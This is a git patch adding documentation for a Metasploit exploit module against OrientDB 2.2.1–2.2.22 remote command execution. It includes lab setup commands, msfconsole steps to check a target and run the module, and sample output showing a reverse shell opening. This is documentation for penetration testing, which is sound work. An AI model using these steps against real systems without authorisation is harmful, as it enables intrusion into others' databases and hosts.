From 00a817d2281d0d72f71d2cba481b05f57ca06e22 Mon Sep 17 00:00:00 2001
From: Ricardo Almeida <ricardojba1@gmail.com>
Date: Thu, 20 Jul 2017 09:03:26 +0100
Subject: [PATCH] Orientdb 2.2.x RCE - Add documentation

---
 .../exploit/multi/http/orientdb_exec.md       | 44 +++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 documentation/modules/exploit/multi/http/orientdb_exec.md

diff --git a/documentation/modules/exploit/multi/http/orientdb_exec.md b/documentation/modules/exploit/multi/http/orientdb_exec.md
new file mode 100644
index 0000000000..fd897dc95a
--- /dev/null
+++ b/documentation/modules/exploit/multi/http/orientdb_exec.md
@@ -0,0 +1,44 @@
+This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
+
+All versions from 2.2.1 up to 2.2.22 should be vulnerable.
+
+The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318
+
+## Vulnerable Application
+OrientDB 2.2.1 <= 2.2.22
+
+## Installation
+Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
+`$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi`
+`$ unzip orientdb-community-2.2.20.zip`
+`$ chmod 755 bin/*.sh`
+`$ chmod -R 777 config`
+`$ cd bin`
+`$ ./server.sh`
+
+## References for running OrientDB 
+http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
+http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html
+
+## References for vulnerability
+https://blogs.securiteam.com/index.php/archives/3318
+http://www.palada.net/index.php/2017/07/13/news-2112/
+https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/orientdb_exec`
+- [ ]  `set rhost <RHOST>`
+- [ ]  `set target <TARGET_NUMBER>`
+- [ ]  `set workspace <WORKSPACE>`
+- [ ]  `check`
+- [ ] **Verify** if the OrientDB instance is vulnerable
+- [ ]  `run`
+- [ ] **Verify** you get a session
+
+## Example Output
+`[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run`
+`[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331`
+`[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...`
+`[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100`
+